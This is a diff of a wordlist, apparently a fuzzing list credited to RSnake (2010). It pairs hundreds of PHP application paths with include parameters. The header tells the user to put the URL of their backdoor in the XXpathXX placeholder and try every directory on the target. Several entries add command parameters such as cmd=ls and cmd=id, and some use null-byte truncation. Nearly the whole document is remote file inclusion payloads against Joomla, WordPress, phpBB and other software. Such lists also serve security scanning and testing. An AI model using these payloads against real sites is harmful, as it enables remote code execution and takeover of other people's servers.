-/web/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path!INJECT!
-/web/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path!INJECT!
-/web/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=!INJECT!
-/web/Flickrclient.php?path_prefix=!INJECT!
-/web/help.php?LIBSDIR=!INJECT!
-/web/includes/blogger.php?path_prefix=!INJECT!
-/web/includes/functions/auto_email_notify.php?path_prefix=!INJECT!
-/web/includes/functions/html_generate.php?path_prefix=!INJECT!
-/web/includes/functions/validations.php?path_prefix=!INJECT!
-/web/index.php?LIBSDIR=!INJECT!
-/web/lib/xml/oai/ListRecords.php?xml_dir=!INJECT!
-/web/login.php?LIBSDIR=!INJECT!
-/web/logout.php?LIBSDIR=!INJECT!
-/web/lom.php?ETCDIR=!INJECT!
-/web/network_module_selector.php?path_prefix=!INJECT!
-/web/submit_abuse.php?path_prefix=!INJECT!
-/web/submit_comment.php?path_prefix=!INJECT!
-/webavis/class/class.php?root=!INJECT!?
-/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=!INJECT!
-/webnews/template.php?content_page=!INJECT!?
-/webroot/css.php?CONFIGS=!INJECT!
-/webyep-system/program/lib/WYURL.php?webyep_sIncludePath=!INJECT!
-/webyep-system/programm/webyep.php?webyep_sIncludePath=!INJECT!?
-/window.php?action=!INJECT!
-/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=!INJECT!?
-/work/index.php?g_include=!INJECT!
-/work/module/forum/forum.php?g_include=!INJECT!
-/worldpay_notify.php?mosConfig_absolute_path=!INJECT!
-/wp-cache-phase1.php?plugin=!INJECT!
-/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=!INJECT!
-/wp-content/plugins/myflash/myflash-button.php?wpPATH=!INJECT!
-/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=!INJECT!
-/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=!INJECT!
-/wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=!INJECT!?
-/wsk/wsk.php?wsk=!INJECT!
-/xarg_corner.php?xarg=!INJECT!?
-/xarg_corner_bottom.php?xarg=!INJECT!?
-/xarg_corner_top.php?xarg=!INJECT!?
-/xoopsgallery/init_basic.php?GALLERY_BASEDIR=!INJECT!?&2093085906=1&995617320=2
-/xt_counter.php?server_base_dir=!INJECT!
-/yabbse/Sources/Packages.php?sourcedir=!INJECT!
-/yacs/scripts/update_trailer.php?context[path_to_root]=!INJECT!?
-/yrch/plugins/metasearch/plug.inc.php?path=!INJECT!
-/ytb/cuenta/cuerpo.php?base_archivo=!INJECT!
-/zipndownload.php?PP_PATH=!INJECT!?
-/zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=!INJECT!?
+# Compiled by RSnake 02/01/2010 Mostly from milw0rm osvdb.org and elsewhere.
+# Change XXpathXX to the path of your backdoor.  Note that you may need to 
+# try it against every directory on the target and because of how this was
+# culled you may need to add a question mark to your own XXpathXX URL:
+# Eg: XXpathXX => http://www.example.com/hax.txt?
+/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=XXpathXX?
+/123flashchat.php?e107path=XXpathXX
+/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=XXpathXX
+/22_ultimate/templates/header.php?mainpath=XXpathXX
+/22_ultimate/templates/header.php?mainpath=XXpathXX?
+/=XXpathXX
+/?_CONFIG[files][functions_page]=XXpathXX
+/?npage=-1&content_dir=XXpathXX%00&cmd=ls
+/?npage=1&content_dir=XXpathXX%00&cmd=ls
+/?show=XXpathXX?
+/A-Blog/navigation/donation.php?navigation_start=XXpathXX
+/A-Blog/navigation/latestnews.php?navigation_start=XXpathXX?
+/A-Blog/navigation/links.php?navigation_start=XXpathXX?
+/A-Blog/navigation/search.php?navigation_end=XXpathXX?
+/A-Blog/sources/myaccount.php?open_box=XXpathXX?
+/ACGVnews/header.php?PathNews=XXpathXX
+/ATutor/documentation/common/frame_toc.php?section=XXpathXX
+/ATutor/documentation/common/search.php?section=XXpathXX
+/ATutor/documentation/common/vitals.inc.php?req_lang=XXpathXX
+/ATutor/include/classes/module/module.class.php?row[dir_name]=XXpathXX
+/ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=XXpathXX
+/AdaptCMS_Lite_1.4_2/plugins/rss_importer_functions.php?sitepath=XXpathXX?
+/Administration/Includes/configureText.php?path_prefix=XXpathXX
+/Administration/Includes/contentHome.php?path_prefix=XXpathXX
+/Administration/Includes/deleteContent.php?path_prefix=XXpathXX
+/Administration/Includes/deleteUser.php?path_prefix=XXpathXX
+/Administration/Includes/userHome.php?path_prefix=XXpathXX
+/Agora_PATH//mdweb/admin/inc/organisations/country_insert.php?chemin_appli=XXpathXX?
+/Agora_PATH//mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=XXpathXX?
+/BE_config.php?_PSL[classdir]=XXpathXX
+/BPNEWS/bn_smrep1.php?bnrep=XXpathXX?&
+/Base/Application.php?pear_dir=XXpathXX
+/Bcwb_PATH/dcontent/default.css.php?root_path_admin=XXpathXX
+/Bcwb_PATH/include/startup.inc.php?root_path_admin=XXpathXX
+/Bcwb_PATH/system/default.css.php?root_path_admin=XXpathXX
+/Beautifier/Core.php?BEAUT_PATH=XXpathXX?
+/BetaBlockModules//Module/Module.php?path_prefix=XXpathXX
+/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=XXpathXX
+/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=XXpathXX
+/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=XXpathXX
+/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path=XXpathXX
+/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=XXpathXX
+/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=XXpathXX
+/BetaBlockModules/EditProfileModule/external.php?path_prefix=XXpathXX
+/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=XXpathXX
+/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=XXpathXX
+/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=XXpathXX
+/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix=XXpathXX
+/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=XXpathXX
+/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=XXpathXX
+/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=XXpathXX
+/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=XXpathXX
+/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=XXpathXX
+/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=XXpathXX
+/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path=XXpathXX
+/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=XXpathXX
+/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=XXpathXX
+/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=XXpathXX
+/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=XXpathXX
+/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=XXpathXX
+/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=XXpathXX
+/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=XXpathXX
+/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=XXpathXX
+/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path=XXpathXX
+/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=XXpathXX
+/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=XXpathXX
+/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=XXpathXX
+/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=XXpathXX
+/BetaBlockModules/MyNetworksModule.php?path_prefix=XXpathXX
+/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=XXpathXX
+/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=XXpathXX
+/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=XXpathXX
+/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=XXpathXX
+/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=XXpathXX
+/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=XXpathXX
+/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=XXpathXX
+/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path=XXpathXX
+/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=XXpathXX
+/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=XXpathXX
+/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=XXpathXX
+/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=XXpathXX
+/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=XXpathXX
+/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=XXpathXX
+/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=XXpathXX
+/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=XXpathXX
+/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=XXpathXX
+/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=XXpathXX
+/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=XXpathXX
+/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=XXpathXX
+/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path=XXpathXX
+/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=XXpathXX
+/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=XXpathXX
+/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path=XXpathXX
+/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=XXpathXX
+/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=XXpathXX?admin
+/BsiliX_path]/files/mbox-action.php3?BSX_LIBDIR=XXpathXX
+/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=XXpathXX?
+/CheckUpload.php?Language=XXpathXX&cmd=ls
+/Contenido_4.8.4/contenido/backend_search.php?contenido_path=XXpathXX?
+/Contenido_4.8.4/contenido/cronjobs/move_articles.php?cfg[path][contenido]=XXpathXX?
+/Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=XXpathXX?
+/Contenido_4.8.4/contenido/cronjobs/optimize_database.php?cfg[path][contenido]=XXpathXX?
+/Contenido_4.8.4/contenido/cronjobs/run_newsletter_job.php?cfg[path][contenido]=XXpathXX?
+/Contenido_4.8.4/contenido/cronjobs/send_reminder.php?cfg[path][contenido]=XXpathXX?
+/Contenido_4.8.4/contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=XXpathXX?
+/Contenido_4.8.4/contenido/cronjobs/setfrontenduserstate.php?cfg[path][contenido]=XXpathXX?
+/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=XXpathXX?
+/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=XXpathXX?
+/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[templates][right_top_blank]=XXpathXX?
+/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=XXpathXX?
+/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=XXpathXX?
+/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[templates][right_top_blank]=XXpathXX?
+/CoupleDB.php?Parametre=0&DataDirectory=XXpathXX?
+/DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=XXpathXX
+/DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=XXpathXX
+/DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=XXpathXX
+/DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=XXpathXX
+/DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=XXpathXX
+/DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=XXpathXX
+/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=XXpathXX
+/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]XXpathXX
+/DON3/applications/don3_requiem.don3app/don3_requiem.php?app_path=XXpathXX
+/DON3/applications/frontpage.don3app/frontpage.php?app_path=XXpathXX?
+/Dir_phNNTP/article-raw.php?file_newsportal=XXpathXX?
+/DynaTracker_v151/action.php?base_path=XXpathXX
+/DynaTracker_v151/includes_handler.php?base_path=XXpathXX
+/Easysite-2.0_path/configuration/browser.php?EASYSITE_BASE=XXpathXX?
+/Ex/modules/threadstop/threadstop.php?exbb[home_path]=XXpathXX?
+/Ex/modules/threadstop/threadstop.php?new_exbb[home_path]=XXpathXX?
+/Exophpdesk_PATH/pipe.php?lang_file=XXpathXX
+/FirstPost/block.php?Include=XXpathXX
+/Flickrclient.php?path_prefix=XXpathXX
+/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=XXpathXX?
+/FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=XXpathXX?
+/Full_Release/include/body_comm.inc.php?content=XXpathXX
+/Gallery/displayCategory.php?basepath=XXpathXX
+/Include/lib.inc.php3?Include=XXpathXX?
+/Include/variables.php3?Include=XXpathXX?
+/Jobline/admin.jobline.php?mosConfig_absolute_path=XXpathXX
+/ListRecords.php?lib_dir=XXpathXX?&cmd=id
+/Lorev1/third_party/phpmailer/class.phpmailer.php?lang_path=XXpathXX
+/MOD_forum_fields_parse.php?phpbb_root_path=XXpathXX
+/Mamblog/admin.mamblog.php?cfgfile=XXpathXX
+/Net_DNS_PATH/DNS/RR.php?phpdns_basedir=XXpathXX?
+/NuclearBB/tasks/send_queued_emails.php?root_path=XXpathXX?
+/OpenSiteAdmin/indexFooter.php?path=XXpathXX%00
+/OpenSiteAdmin/pages/pageHeader.php?path=XXpathXX?
+/OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=XXpathXX%00
+/OpenSiteAdmin/scripts/classes/FieldManager.php?path=XXpathXX%00
+/OpenSiteAdmin/scripts/classes/Filter.php?path=XXpathXX%00
+/OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=XXpathXX%00
+/OpenSiteAdmin/scripts/classes/Form.php?path=XXpathXX%00
+/OpenSiteAdmin/scripts/classes/FormManager.php?path=XXpathXX%00
+/OpenSiteAdmin/scripts/classes/LoginManager.php?path=XXpathXX%00
+/PHP/includes/header.inc.php?root=XXpathXX?
+/PHPDJ_v05/dj/djpage.php?page=XXpathXX?
+/PaTh/index.php?rootpath=XXpathXX
+/Path_Script/createurl.php?formurl=XXpathXX
+/PhotoCart/adminprint.php?admin_folder=XXpathXX
+/Picssolution/install/config.php?path=XXpathXX?
+/RGboard/include/footer.php?_path[counter]=XXpathXX?
+/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=XXpathXX?
+/SQuery/lib/gore.php?libpath=XXpathXX
+/SazCart/admin/alayouts/default/pages/login.php?_saz[settings][site_url]=XXpathXX?
+/SazCart/layouts/default/header.saz.php?_saz[settings][site_dir]=XXpathXX?
+/ScriptPage/source/includes/load_forum.php?mfh_root_path=XXpathXX
+/ScriptPath/footers.php?tinybb_footers=XXpathXX
+/ScriptPath/index.php?page=XXpathXX
+/Script_Path/config.inc.php?_path=XXpathXX?
+/Scripts/app_and_readme/navigator/index.php?page=XXpathXX
+/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=XXpathXX
+/Somery/team.php?checkauth=XXpathXX
+/Upload/install.php?skindir=XXpathXX
+/Widgets/Base/Footer.php?sys_dir=XXpathXX
+/Widgets/Base/widget.BifContainer.php?sys_dir=XXpathXX
+/Widgets/Base/widget.BifRoot.php?sys_dir=XXpathXX
+/Widgets/Base/widget.BifRoot2.php?sys_dir=XXpathXX
+/Widgets/Base/widget.BifRoot3.php?sys_dir=XXpathXX
+/Widgets/Base/widget.BifWarning.php?sys_dir=XXpathXX
+/WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=XXpathXX?
+/[path]/mybic_server.php?file=XXpathXX
+/[path]/previewtheme.php?theme=1&inc_path=XXpathXX?cmd
+/_administration/securite.php?cfg[document_uri]=XXpathXX
+/_blogadata/include/struct_admin.php?incl_page=XXpathXX?
+/_conf/_php-core/common-tpl-vars.php?admindir=XXpathXX
+/_connect.php?root=XXpathXX
+/_friendly/core/data/_load.php?friendly_path=XXpathXX
+/_friendly/core/data/yaml.inc.php?friendly_path=XXpathXX
+/_friendly/core/display/_load.php?friendly_path=XXpathXX
+/_friendly/core/support/_load.php?friendly_path=XXpathXX
+/_functions.php?prefix=XXpathXX
+/_includes/settings.inc.php?approot=XXpathXX
+/_theme/breadcrumb.php?rootBase=XXpathXX
+/_wk/wk_lang.php?WK[wkPath]=XXpathXX
+/abf_js.php?abs_pfad=XXpathXX?&cmd=id
+/about.php?CONFIG[MWCHAT_Libs]=XXpathXX?
+/about.php?bibtexrootrel=XXpathXX?
+/aboutinfo.php?bibtexrootrel=XXpathXX?
+/acc.php?page=XXpathXX
+/access/login.php?path_to_root=XXpathXX
+/account.php?insPath=XXpathXX
+/accsess/login.php?path_to_root=XXpathXX
+/active/components/xmlrpc/client.php?c[components]=XXpathXX
+/ad_main.php?_mygamefile=XXpathXX
+/add.cgi.php?blog_theme=XXpathXX
+/add_link.php?blog_theme=XXpathXX
+/addpost_newpoll.php?addpoll=preview&thispath=XXpathXX
+/addressbook.php?GLOBALS[basedir]=XXpathXX?
+/addsite.php?returnpath=XXpathXX
+/addvip.php?msetstr["PROGSDIR"]=XXpathXX
+/adm/krgourl.php?DOCUMENT_ROOT=XXpathXX?
+/adm/my_statistics.php?DOCUMENT_ROOT=XXpathXX?
+/admin.loudmouth.php?mainframe=XXpathXX
+/admin.php?Madoa=XXpathXX?
+/admin.php?cal_dir=XXpathXX
+/admin.php?env_dir=XXpathXX
+/admin.php?lang=XXpathXX
+/admin.php?page[path]=XXpathXX?&cmd=ls
+/admin.php?submit=submit&form_include_template=XXpathXX
+/admin/PLUGINs/NP_UserSharing.php?DIR_ADMIN=XXpathXX?admin
+/admin/ST_countries.php?include_path=XXpathXX?
+/admin/ST_platforms.php?include_path=XXpathXX?
+/admin/addentry.php?phpbb_root_path=XXpathXX?
+/admin/addons/archive/archive.php?adminfolder=XXpathXX
+/admin/admin.php?path=XXpathXX
+/admin/admin.php?site_url=XXpathXX
+/admin/admin_forgotten_password.php?root_folder_path=XXpathXX
+/admin/admin_news_bot.php?root_path=XXpathXX?
+/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=XXpathXX
+/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=XXpathXX
+/admin/admin_users.php?phpbb_root_path=XXpathXX
+/admin/auth.php?xcart_dir=XXpathXX?
+/admin/auth/secure.php?cfgProgDir=XXpathXX?
+/admin/autoprompter.php?CONFIG[BASE_PATH]=XXpathXX
+/admin/bin/patch.php?INSTALL_FOLDER=XXpathXX
+/admin/catagory.php?language=XXpathXX
+/admin/classes/pear/OLE/PPS.php?homedir=XXpathXX
+/admin/classes/pear/OLE/PPS/File.php?homedir=XXpathXX
+/admin/classes/pear/OLE/PPS/Root.php?homedir=XXpathXX
+/admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=XXpathXX
+/admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=XXpathXX
+/admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=XXpathXX
+/admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=XXpathXX
+/admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=XXpathXX
+/admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=XXpathXX
+/admin/code/index.php?load_page=XXpathXX
+/admin/comment.php?config[installdir]=XXpathXX
+/admin/common-menu.php?CONF[local_path]=XXpathXX
+/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=XXpathXX?
+/admin/config_settings.tpl.php?include_path=XXpathXX?&cmd=id
+/admin/directory.php?config[installdir]=XXpathXX
+/admin/doeditconfig.php?thispath=../includes&config[path]=XXpathXX
+/admin/frontpage_right.php?loadadminpage=XXpathXX
+/admin/header.php?loc=XXpathXX
+/admin/inc/add.php?format_menue=XXpathXX
+/admin/inc/change_action.php?format_menue=XXpathXX
+/admin/include/common.php?commonIncludePath=XXpathXX?
+/admin/include/header.php?repertoire=XXpathXX?
+/admin/include/lib.module.php?mod_root=XXpathXX
+/admin/includes/admin_header.php?level=XXpathXX?
+/admin/includes/author_panel_header.php?level=XXpathXX?
+/admin/includes/header.php?bypass_installed=1&secure_page_path=XXpathXX%00
+/admin/includes/spaw/spaw_control.class.php?spaw_root=XXpathXX?
+/admin/index.php?path_to_script=XXpathXX?&cmd=ls
+/admin/index.php?pg=XXpathXX?
+/admin/index.php?xtrphome=XXpathXX
+/admin/index_sitios.php?_VIEW=XXpathXX
+/admin/lib_action_step.php?GLOBALS[CLASS_PATH]=XXpathXX
+/admin/login.php?absolute_path=XXpathXX
+/admin/news.admin.php?path_to_script=XXpathXX?&cmd=ls
+/admin/news.php?language=XXpathXX
+/admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=XXpathXX
+/admin/sendmsg.php?config[installdir]=XXpathXX
+/admin/setup/level2.php?dir=XXpathXX
+/admin/system/config/conf-activation.php?site_path=XXpathXX
+/admin/system/include.php?skindir=XXpathXX
+/admin/system/include.php?start=1&skindir=XXpathXX
+/admin/system/menu/item.php?site_path=XXpathXX
+/admin/system/modules/conf_modules.php?site_path=XXpathXX
+/admin/templates/template_thumbnail.php?thumb_template=XXpathXX
+/admin/testing/tests/0004_init_urls.php?init_path=XXpathXX?&
+/admin/themes.php?config[installdir]=XXpathXX
+/admin/tools/utf8conversion/index.php?path=XXpathXX?
+/admin/user_user.php?language=XXpathXX
+/admincp/auth/checklogin.php?cfgProgDir=XXpathXX
+/admincp/auth/secure.php?cfgProgDir=XXpathXX
+/adminhead.php?path[docroot]=XXpathXX
+/admini/admin.php?INC=XXpathXX?
+/admini/index.php?INC=XXpathXX?
+/administrator/admin.php?site_absolute_path=XXpathXX?
+/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=XXpathXX?
+/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=XXpathXX?
+/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=XXpathXX?
+/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=XXpathXX?
+/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=XXpathXX?
+/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=XXpathXX?
+/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=XXpathXX?
+/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
+/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
+/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
+/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
+/administrator/components/com_color/admin.color.php?mosConfig_live_site=XXpathXX?
+/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
+/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
+/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=XXpathXX?
+/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
+/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_events/admin.events.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=XXpathXX
+/administrator/components/com_extended_registration/admin.extended_registration.php?mosConfig_absolute_path=XXpathXX?
+/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
+/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=XXpathXX?
+/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=XXpathXX?
+/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=XXpathXX
+/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=XXpathXX
+/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=XXpathXX?
+/administrator/components/com_jreactions/langset.php?comPath=XXpathXX?
+/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=XXpathXX?
+/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=XXpathXX?
+/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=XXpathXX?
+/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=XXpathXX?
+/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=XXpathXX
+/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=XXpathXX
+/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=XXpathXX?
+/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=XXpathXX?
+/administrator/components/com_tour_toto/admin.tour_toto.php?mosConfig_absolute_path=XXpathXX?
+/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=XXpathXX
+/administrator/components/com_webring/admin.webring.docs.php?component_dir=XXpathXX?
